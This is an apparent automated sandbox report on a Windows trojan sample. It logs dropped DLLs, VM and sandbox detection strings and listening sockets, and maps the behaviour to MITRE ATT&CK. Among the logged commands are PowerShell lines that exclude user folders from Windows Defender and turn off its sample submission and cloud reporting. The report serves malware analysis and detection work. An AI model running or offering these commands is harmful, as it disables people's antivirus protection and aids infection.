Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\e5xaOqBz
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\nHqxqt5L
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\TLbqzKsW
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\miECvZvT
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\T9229YlC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\fQQIqQM0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_29-59834
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Check user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-11199
Source: C:\Users\user\Desktop\file.exe TID: 5748 Thread sleep time: -23760000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5748 Thread sleep time: -119997s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212 Thread sleep count: 5505 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212 Thread sleep count: 4302 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380 Thread sleep count: 8228 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380 Thread sleep count: 1286 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep count: 7002 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 Thread sleep count: 2690 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8184 Thread sleep count: 165 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8184 Thread sleep time: -82500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7188 Thread sleep count: 178 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7188 Thread sleep time: -89000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7180 Thread sleep count: 71 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8004 Thread sleep count: 1401 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8004 Thread sleep time: -4203000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8004 Thread sleep count: 6871 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8004 Thread sleep time: -20613000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\Desktop\file.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CE3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,13_2_00007FF7E3CE3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 29_2_00007FF7AABD47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FF7AABD47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 29_2_00007FFB2270A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB2270A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 29_2_00007FFB22731883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB22731883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 29_2_00007FFB22765BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB22765BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 29_2_00007FFB23AB57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23AB57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 29_2_00007FFB23AD5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23AD5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 29_2_00007FFB23B02FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23B02FE3
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 120000
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 119997
Source: file.exe Binary or memory string: =QemuLH
Source: svchost.exe, 00000002.00000002.2526307322.000001FBE9464000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: svchost.exe, 00000002.00000002.2526005018.000001FBE944D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000002.00000002.2525800047.000001FBE9427000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000028.00000002.2527366735.00000298640B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526801542.000002986402B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: svchost.exe, 00000002.00000002.2526506814.000001FBE9502000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: svchost.exe, 00000005.00000003.2003948520.000001E70113E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6000c298128b8c02a71a2474aeb5f3dc|Virtual disk |VMware
Source: file.exe, 00000008.00000002.2526951120.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2525477850.0000024C9102B000.00000004.00000020.00020000.00000000.sdmp, yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546477161.00000239DD11D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001D.00000002.2202769902.0000027B4335C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001D.00000003.1489637593.0000027B4337C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: main.exe, 00000029.00000002.2528204660.000001FE46857000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
Source: svchost.exe, 00000005.00000003.2003948520.000001E70113E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000005.00000003.2003948520.000001E70113E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C6000c298128b8c02a71a2474aeb5f3dc|Virtual disk |VMware
Source: svchost.exe, 00000002.00000002.2525800047.000001FBE9427000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,1
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: svchost.exe, 00000002.00000002.2525442740.000001FBE9402000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIES1371
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM
Source: svchost.exe, 00000028.00000002.2526962025.0000029864088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXT15E6VMWare
Source: svchost.exe, 00000002.00000002.2526005018.000001FBE944D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: svchost.exe, 00000005.00000003.2003948520.000001E70113E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CEFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,13_2_00007FF7E3CEFF1F
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CE8CFC FreeLibrary,strlen,GetProcessHeap,HeapAlloc,BuildTrusteeWithSidW,BuildSecurityDescriptorW,GetProcessHeap,HeapFree,LocalFree,13_2_00007FF7E3CE8CFC
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CE1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,13_2_00007FF7E3CE1131
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CFB6A0 SetUnhandledExceptionFilter,13_2_00007FF7E3CFB6A0
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CF05D9 SetUnhandledExceptionFilter,13_2_00007FF7E3CF05D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 29_2_00007FF7AABD1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,29_2_00007FF7AABD1131

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CE292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,13_2_00007FF7E3CE292E
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7988 -s 1128
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe | Code function: 13_2_00007FF7E3CE6FD5 GetSystemTimeAsFileTime
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 29_2_00007FFB22706DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
Source: svchost.exe, 00000004.00000002.2527090357.000001F3CD902000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000004.00000002.2527090357.000001F3CD902000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: lr75sq5smrngkif9fpn.exe, 0000000D.00000002.1312495889.0000025BBA428000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 29_2_00007FFB227058DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 29_2_00007FFB2273AEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 29_2_00007FFB22761F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 29_2_00007FFB23AB28BA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 29_2_00007FFB23ACB820 listen,htons,recv,select
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 29_2_00007FFB23ACB7E8 bind
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 29_2_00007FFB23AD418A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 29_2_00007FFB23B015FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 11 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 21 Disable or Modify Tools | 1 Network Sniffing | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 3 Native API | 1 DLL Side-Loading | 2 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 2 Access Token Manipulation | 2 Obfuscated Files or Information | Security Account Manager | 1 System Service Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 3 Service Execution | 2 Valid Accounts | 14 Windows Service | 1 Timestomp | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 14 Windows Service | 11 Process Injection | 1 DLL Side-Loading | LSA Secrets | 1 Network Sniffing | SSH | Keylogging | 1 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | 1 Services File Permissions Weakness | 1 Services File Permissions Weakness | 1 File Deletion | Cached Domain Credentials | 35 System Information Discovery | VNC | GUI Input Capture | 1 Proxy | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Masquerading | DCSync | 1 Network Share Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Valid Accounts | Proc Filesystem | 261 Security Software Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 2 Access Token Manipulation | /etc/passwd and /etc/shadow | 151 Virtualization/Sandbox Evasion | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 151 Virtualization/Sandbox Evasion | Network Sniffing | 2 Process Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 11 Process Injection | Input Capture | 1 Application Window Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Hidden Users | Keylogging | 1 System Owner/User Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 1 Services File Permissions Weakness | GUI Input Capture | 1 System Network Configuration Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
[Behavior Graph: ID: 1517355, Sample: file.exe, Startdate: 25/09/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
file.exe | 3% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe | 100% | Joe Sandbox ML | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll | 0% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll | 0% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll | 0% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll | 0% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | 11% | ReversingLabs | Win64.Trojan.Barys |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll | 0% | ReversingLabs | |
